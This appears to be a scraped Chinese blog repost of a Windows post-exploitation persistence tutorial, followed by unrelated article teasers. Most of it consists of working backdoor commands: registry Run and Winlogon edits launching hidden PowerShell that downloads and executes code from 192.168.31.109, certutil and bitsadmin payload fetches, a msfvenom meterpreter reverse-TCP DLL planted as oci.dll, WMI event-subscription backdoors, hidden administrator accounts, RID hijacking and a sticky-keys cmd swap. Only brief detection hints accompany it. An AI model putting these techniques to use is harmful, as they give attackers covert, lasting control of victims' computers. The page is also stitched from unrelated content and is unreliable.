毕业设计做系统网站好简单软件开发工具

diannao/2026/1/16 17:10:55/文章来源:
毕业设计做系统网站好,简单软件开发工具,网站建设模板ppt模板,法库网站建设注册表类#xff1a; 普通注册表后门 在一般用户权限下#xff0c;通常是将要执行的后门程序或脚本路径填写到如下注册表的键值中HKCU\Software\Microsoft\Windows\CurrentVersion\Run#xff0c;键名任意。普通权限即可运行 cmd下操作#xff1a; reg add HKEY_…注册表类 普通注册表后门 在一般用户权限下通常是将要执行的后门程序或脚本路径填写到如下注册表的键值中HKCU\Software\Microsoft\Windows\CurrentVersion\Run键名任意。普通权限即可运行 cmd下操作 reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Pentestlab /t REG_SZ /d C:\Users\administrator\desktop\pentestlab.exe powershell下操作 Set-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\ Pentestlab C:\Users\administrator\desktop\pentestlab.exe -Forc 电脑重启后上线 除了上面的位置之外还有下面的位置可以让我们实现权限维持 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 上面的是针对于用户的注册表下面的这几个是针对本地计算机的注册表 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 添加载荷的方法的自然也和之前的一样了只是所处的位置不同罢了注意service的程序。而防御与检测策略也是比较好做的在这些的注册表的位置查看是否有可疑程序即可。 Winlogon Helper DLL后门 Winlogon是一个Windows组件用来处理各种活动如登录、注销、身份验证期间加载用户配置文件、关闭、锁定屏幕等。这种行为由注册表管理该注册表定义在Windows登录期间启动哪些进程。所以我们可以依靠这个注册表来进行权限维持。 注册表位置如下 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify 其中的userinit与shell主要是来运行exe程序而notify则用来执行dll文件Windows 7之前。   而userinit又可以通过powershell的方式来实现无文件后门用法如下 PS C:\Users\Administrator Set-ItemProperty HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon -name Userinit -value C:\Windows\system32\userinit.exe,powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(http://192.168.31.109:8080/a)) 注意代码引号的转义问题。可以使用反引号绕过。 Logon Scripts后门 注册表路径: HKCU\Environment\ 创建字符串键值: UserInitMprLogonScript cmd下操作 reg add HKCU:\Environment\ /v UserInitMprLogonScript /t REG_SZ /d C:\1.bat powershell下操作 Set-ItemProperty HKCU:\Environment\ UserInitMprLogonScript C:\1.bat -Force bat内容如下 powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(http://192.168.31.109:8080/a)) Logon Scripts是优先于很多杀毒软件启动部分杀毒是优先于他启动的所以可以通过这种方式将powershell命令写到bat脚本中达到免杀隐藏启动的效果。 缺点就是需要留文件并不方便。 注册表之CLR CLR全称为Common Language Runtime公共语言运行库是一个可由多种编程语言使用的运行环境。 要使clr能够劫持系统中全部.net程序需要设置环境变量要是只用命令行可以使用wmi。 直接给出批处理文件 wmic ENVIRONMENT create nameCOR_ENABLE_PROFILING,username%username%,VariableValue1 wmic ENVIRONMENT create nameCOR_PROFILER,username%username%,VariableValue{11111111-1111-1111-1111-111111111111} certutil.exe -urlcache -split -f yourdll certutil.exe -urlcache -split -f yourdll delete SET KEYHKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32 REG.EXE ADD %KEY% /VE /T REG_SZ /D %CD%\msg.dll /F REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F x64 wmic ENVIRONMENT create nameCOR_ENABLE_PROFILING,username%username%,VariableValue1 wmic ENVIRONMENT create nameCOR_PROFILER,username%username%,VariableValue{11111111-1111-1111-1111-111111111111} certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll delete SET KEYHKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32 REG.EXE ADD %KEY% /VE /T REG_SZ /D %CD%\msg_x64.dll /F REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F SET KEYHKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32 REG.EXE ADD %KEY% /VE /T REG_SZ /D %CD%\msg.dll /F REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F 内部工具类 waitfor.exe 该工具用来同步网络中计算机可以发送或等待系统上的信号。 支持下列操作系统 Windows Server 2003 Windows Vista Windows XP Windows Server 2008 Windows 7 Windows Server 2003 with SP2 Windows Server 2003 R2 Windows Server 2008 R2 Windows Server 2000 Windows Server 2012 Windows Server 2003 with SP1 Windows 8 Windows 10 首先新建一个powershell文件内容为 start-process calc.execmd /c waitfor persist powershell -executionpolicy bypass -file c:\test\1.ps1 然后开启等待 waitfor persist1 powershell -executionpolicy bypass -file c:\test\1.ps1 另一个cmd waitfor /s 127.0.0.1 /si persist1 即可成功调用cmd。 注意低版本powershell会报错 或者使用三好学生师傅的脚本 #A quick POC to use Waitfor.exe to maintain persistenceAuthor: 3gstudent 3gstudentLearn from:https://twitter.com/danielhbohannon/status/872258924078092288 # $StaticClass New-Object Management.ManagementClass(root\cimv2, $null,$null) $StaticClass.Name Win32_Backdoor $StaticClass.Put()| Out-Null $StaticClass.Properties.Add(Code , cmd /c start calc.exe taskkill /f /im powershell.exe waitfor persist powershell -nop -W Hidden -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA) $StaticClass.Put() | Out-Null$exec([WmiClass] Win32_Backdoor).Properties[Code].Value; iex $exec | Out-Null 然后使用下面的方式开启 powershell -executionpolicy bypass .\test.ps1 waitfor /s 127.0.0.1 /si persist 即可看到效果。 bitsadmin win7之后进行上传下载的工具。 利用方法如下 PS C:\Users\Administrator bitsadmin /create backdoor PS C:\Users\Administrator bitsadmin /addfile backdoor c:\windows\system32\calc.exe c:\Users\administrator\Desktop\calc.exe PS C:\Users\Administrator bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe /u /s /i:http://192.168.31.109/calc.sct scrobj.dll PS C:\Users\Administrator bitsadmin /Resume backdoor 当然换成msf的sct也就可以上线了。白名单运行程序不仅仅只有regsvr32还有别的很多可以去查下资料 可以使用下面的方法进行检测 PS C:\Users\Administrator bitsadmin /list /verbose msdtc加载后门 msdtc.exe 存在于组环境和域环境中,是微软的一个分布式事物处理协调器服务。要求处于工作组或者域环境内。 因为他在启动时会默认加载oci.dllSQLLib80.dll和xa80.dll。Windows系统默认不包含oci.dll。 我们将后门dll将其重命名为oci.dll并将其放置在%SystemRoot%\system32\中那么重启时就会加载我们的dll然后得到一个session。 注意dll版本要根据目标机器的位数来生成。 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.31.109 LPORT4444 -f dll oci.dllcmd或powershell下执行 taskkill /f /im msdtc.exe net start msdtc 即可获得会话。 wmi执行后门技术 WMI可以描述为一组管理Windows系统的方法和功能。我们可以把它当作API来与Windows系统进行相互交流。WMI在渗透测试中的价值在于它不需要下载和安装 因为WMI是Windows系统自带功能。而且整个运行过程都在计算机内存中发生不会留下任何痕迹。 在使用wmi进行权限维持的时候我们一般用到下面的三个类 __EventFilter EventConsumer __FilterToConsumerBinding 下面我们看下他的利用方式首先是mof。 msf先生成一个web的监听然后使用msf生成文件。 irbputs generate_mof(Metasploit1,regsvr32 /s /n /u /i:http://192.168.31.109:8080/RjdtuMLURHfkH.sct scrobj.dll) 然后编译mof mofcomp.exe .\Metasploit.mof 即可得到会话。第二种方式就是使用wmi事件。 命令如下 wmic /NAMESPACE:\\root\subscription PATH __EventFilter CREATE NamePentestLab, EventNameSpaceroot\cimv2,QueryLanguageWQL, QuerySELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System wmic /NAMESPACE:\\root\subscription PATH CommandLineEventConsumer CREATE NamePentestLab, ExecutablePathC:\users\administrator\desktop\msf.exe,CommandLineTemplateC:\users\administrator\desktop\msf.exe wmic /NAMESPACE:\\root\subscription PATH __FilterToConsumerBinding CREATE Filter__EventFilter.Name\PentestLab\, ConsumerCommandLineEventConsumer.Name\PentestLab\ 然后重启电脑60s后反弹会话。 powershell版本 $FilterArgs {namePentestlab-WMI;EventNameSpaceroot\CimV2;QueryLanguageWQL;QuerySELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System AND TargetInstance.SystemUpTime 240 AND TargetInstance.SystemUpTime 325}; $FilterNew-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs$ConsumerArgs {namePentestlab-WMI;CommandLineTemplate$($Env:SystemRoot)\System32\pentestlab.exe;} $ConsumerNew-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs$FilterToConsumerArgs { Filter [Ref] $Filter; Consumer [Ref] $Consumer; } $FilterToConsumerBinding New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs 如果想要删除的话可以使用下面的命令 $EventConsumerToCleanup Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter Name Pentestlab-WMI $EventFilterToCleanup Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter Name Pentestlab-WMI $FilterConsumerBindingToCleanup Get-WmiObject -Namespace root/subscription -Query REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass __FilterToConsumerBinding$FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject powershell版本的也可以直接使用别人写好的脚本https://github.com/n0pe-sled/WMI-Persistence/blob/master/WMI-Persistence.ps1 当然以下工具都具有该功能Empire、SharpSploit、PoshC2、PowerLurk、WMIPersist、 而对于此类攻击的检测就查看上面所说的那三种类就可以了。 #List Event Filters Get-WMIObject -Namespace root\Subscription -Class __EventFilter#List Event Consumers Get-WMIObject -Namespace root\Subscription -Class __EventConsumer#List Event Bindings Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding 且能发现木马的踪迹 计划任务 经典中的经典。 schtasks.exe /Create /TN update /TR xx(你要执行的命令) /SC ONLOGON /F /RL HIGHEST demo C:\Users\Administratorschtasks /create /sc minute /mo 1 /tn chrome /tr wscript.exe C:\users\Administrator\Desktop\msf.vbs 或者使用powershell无文件加载也是可以的。 WinRM服务后门 基本原理是使用Windows 的远程管理管理服务WinRM组合HTTP.sys驱动自带的端口复用功能一起实现正向的端口复用后门。后门连接是需要目标服务器的高权用户的明文密码的需要先抓取相应的明文密码才可部署后门。 下面是部署方法 winrm set winrm/config/service {EnableCompatibilityHttpListenertrue} //开启监听 winrm set winrm/config/Listener?Address*TransportHTTP {Port80} //更改wimrm的端口防止被怀疑 查看状态 winrm e winrm/config/listener 然后链接后门本地做如下设置 winrm quickconfig -q winrm set winrm/config/Client {TrustedHosts*} 然后连接后门获得cmd环境。 C:\Users\Administratorwinrs -r:http://192.168.31.94 -u:administrator -p:abc123! cmd 如果是非管理员用户用下面的方法修改注册表即可。 reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f 修改系统服务 使用sc制作权限维持 #创建Fax传真服务并设置为自启动 sc create Fax binPath C:\123123.exe start auto obj LocalSystem #增加服务描述 sc descrīption Fax #启动 sc start Fax 重启获得会话。 记得监听添加下面的参数防止假死 set autorunscript migrate -f dll劫持 这个看个人的思路以及编码能力了比如劫持个安全狗 远程登录类 影子账户、克隆账户、激活guest net user test$ 123456 /addnet localgroup administrators test$ /add net user guest /active:yes net user guest 1234 net localgroup administrators guest /add rid_hijack 通过劫持有效帐户的RID来在注册表中进行修改以使Guest帐户成为管理员 msf5 post(windows/manage/rid_hijack) set session 5 session 5 msf5 post(windows/manage/rid_hijack) set getsystem true getsystem true msf5 post(windows/manage/rid_hijack) set guest_account true guest_account true msf5 post(windows/manage/rid_hijack) set password 123!ASQs password 123!ASQs msf5 post(windows/manage/rid_hijack) exploit 然后impacket链接 shift后门 C:\Windows\System32\sethc.exe 粘滞键启动快捷键按五次shift键 C:\Windows\System32\utilman.exe 设置中心启动快捷键WindowsU键 cd c:\Windows\System32 move sethc.exe sethc.exe.bak copy cmd.exe sethc.exe 高版本的话就映像劫持吧。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/91364.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

wordpress 资源站主题群晖wordpress

Ubuntu22部署MySQL5.7详细教程 一、下载MySQL安装包二、安装MySQL三、启动MySQL检查状态登录MySQL 四、开启远程访问功能1、允许其他主机通过root访问数据库2、修改配置文件,允许其他IP通过自定义端口访问 五、使用Navicat连接数据库 默认情况下,Ubuntu2…

大连城乡住房建设厅网站源码网站下载

1.《大学计算机》课程与其它类似的课程有什么不同?《大学计算机》是面向大学一年级学生开设的计算机通识类课程,类似的还有《大学计算机基础》、《计算机应用基础》,或者《计算机文化基础》、《信息技术基础》等课程,它和这些不同…

门户网站做商城的无锡做网站的企业

这个一个比较低级的问题,为避免两次犯这样的低级错误,特此记录。 发生这个问题的原因是未包含头文件,例如: test.h //在头文件中声明了导出函数test() #ifdef __cplusplus extern "C" { #endif /*__cplusplus 1*/ext…

外贸论坛网站有哪些阿里巴巴网站优化

1.证书 cer文件需要上传电脑CSR文件,所以其他电脑如需使用需要创建者导出,用于在项目在真机运行或archive的时候签名,Code Signing Identity. 项目App ID,Provisioning Profile只要有管理员权限就可以申请,与cer文件对…

美团网站建设总体需求与目标浙里建系统平台

1588. 所有奇数长度子数组的和 给你一个正整数数组 arr ,请你计算所有可能的奇数长度子数组的和。 子数组 定义为原数组中的一个连续子序列。 请你返回 arr 中 所有奇数长度子数组的和 。 示例 1: 输入:arr [1,4,2,5,3] 输出&#xff1…

晋江怎么交换友情链接石家庄网站优化

在上一篇文章使用PerfView监测.NET程序性能(三):分组中,我们使用了Perfview的分组功能。分组功能旨在对某些函数按照某个格式进行分组,以减少视图中的各种无关函数的数量。但仅有分组还不够,有时我们想将一…

可以做h5的网站有哪些user post wordpress

插入数据需要使用 INSERT INTO 语句。该语句有多种写法,具体取决于插入的数据来源和目标,下面介绍一些常见用法和语法。 1.插入所有列的值 如果要将数据插入到表中的所有列中,则可以使用以下 INSERT INTO 语句: INSERT INTO tab…

网站托管西安wordpress编辑器百度

这篇文章简单记录 ASP.NET Core中 ,startup类的一些使用。一.前言在 Startup类中,一般有两个方法:ConfigureServices 方法: 用来配置应用的 service 。 Configure 方法:创建应用的请求处理管道它们都在应用启动时,被AS…

做淘宝网站如何提取中间的提成防护网施工方案

非现金支付时代&#xff0c;非现金支付已经成为了生活不可或缺的一部分&#xff0c;我们只需要一台手机便可走遍全国各地&#xff08;前提是支付宝&#xff0c;微信有钱<00>&#xff09;,那么作为测试人员&#xff0c;支付测试也是非常重要的一环&#xff0c;那么下面我就…

网站建设教程ppt深圳英文站seo

1. web开发 1.1 web开发介绍 Web指的是World Wide Web(万维网), 是一种基于互联网的信息系统. 万维网由一系列通过超文本链接相互连接的页面组成, 这些页面中包含了文本, 图像, 音频, 视频等多媒体内容. 用户可以通过浏览器访问万维网上的网页, 并通过超链接在不同页面之间导…

云南哪几个建网站公司网站维护员

直播语音实时转字幕&#xff1a; 基于Whisper的实时直播语音转录或翻译是一项使用OpenAI的Whisper模型实现的技术&#xff0c;它能够实时将直播中的语音内容转录成文本&#xff0c;甚至翻译成另一种语言。这一过程大致分为三个步骤&#xff1a;捕获直播音频流、语音识别&#x…

网站怎么被百度收录营销网站建设网站设计

今日学习的文章链接和视频链接 leetcode题目地址&#xff1a;225. 用队列实现栈 代码随想录题解地址&#xff1a;代码随想录 题目简介 请你仅使用两个队列实现一个后入先出&#xff08;LIFO&#xff09;的栈&#xff0c;并支持普通栈的全部四种操作&#xff08;push、top、p…

vue做的网站多么网站建设策略营销

基于matlab的孪生支持向量机&#xff08;Twin support vector machine,TWSVM&#xff09;是SVM的一种变形算法。该采用WSVM进行二分类&#xff0c;程序已注释数据可更换自己的&#xff0c;程序已调通&#xff0c;可直接运行。 126matlabTWSVM模式识别 (xiaohongshu.com)

泉州网站制作企业谁分享一个免费网站2021

欢迎您成为我的读者&#xff0c;希望这篇文章能给你一些帮助。前言今天在群里看到朋友讨论把粉丝称为读者&#xff0c;这让我内心特别激动。以前我还是比较关注自己的文章阅读量&#xff0c;有没有人转发&#xff0c;今天新增多少个关注。而现在&#xff0c;我的关注点变了&…

网站建设 通讯员软件属于网站开发吗

LineControl Editor是一款基于Bootstrap的响应式、所见即所得的富文本编辑器jQuery插件。该富文本编辑器可以使用textarea元素或任何一个容器元素来生成&#xff0c;它拥有常见富文本编辑器的所有功能&#xff0c;使用快捷方便。插件依赖该富文本编辑器插件依赖于jQuery2.1.0和…

关于公司网站怎么做设计ui是什么意思

一、引言 1.水资源的重要性 水是生命之源,是人类生存和发展的基础。它是生态系统中不可或缺的组成部分,对于维系地球上的生命、农业、工业、城市发展等方面都具有至关重要的作用。 2.水质安全与人类健康的关系 水质安全直接关系到人类的健康和生存。水中的污染物和有害物…

17网站一起做网店潮汕wordpress 调用评论数量

题目名称&#xff1a; 寻找只出现一次的两个数字 题目内容&#xff1a; 在一个数组中&#xff0c;只有两个数字出现了一次&#xff0c;其他所有数字都出现了两次。本篇博客将介绍如何编写一个函数来找出这两个只出现一次的数字。 解题思路&#xff1a; 要解决这个问题&#…

绍兴做外贸网站的公司网站建设价格兴田德润i网址多少

错误处理&#xff1a; 许多系统调用和函数在失败后&#xff0c;会在失败时设置外部变量errno的值来指明失败原因。许多不同的函数库都把这个变量作为报告错误的标准方法。程序必须在函数报告出错后立刻检查errno变量&#xff0c;因为它可能被下一个函数调用所覆盖&#xff…

吗网站建设网站建设 制作

仓库管理系统&#xff1a;仓库管理系统是一种基于互联网对实际仓库的管理平台&#xff0c;旨在提供一个方便、快捷、安全的存取货物和查询商品信息平台。该系统通过在线用户登录查询&#xff0c;可以线上操作线下具体出/入库操作、查询仓库商品信息、提高仓库运作效率&#xff…

南宁自助模板建站微软雅黑做网站会涉及到侵权吗

item_search-按关键字搜索商品API测试工具 alibaba.item_search 公共参数 名称类型必须描述keyString是调用key&#xff08;必须以GET方式拼接在URL中&#xff09;secretString是调用密钥api_nameString是API接口名称&#xff08;包括在请求地址中&#xff09;[item_search,…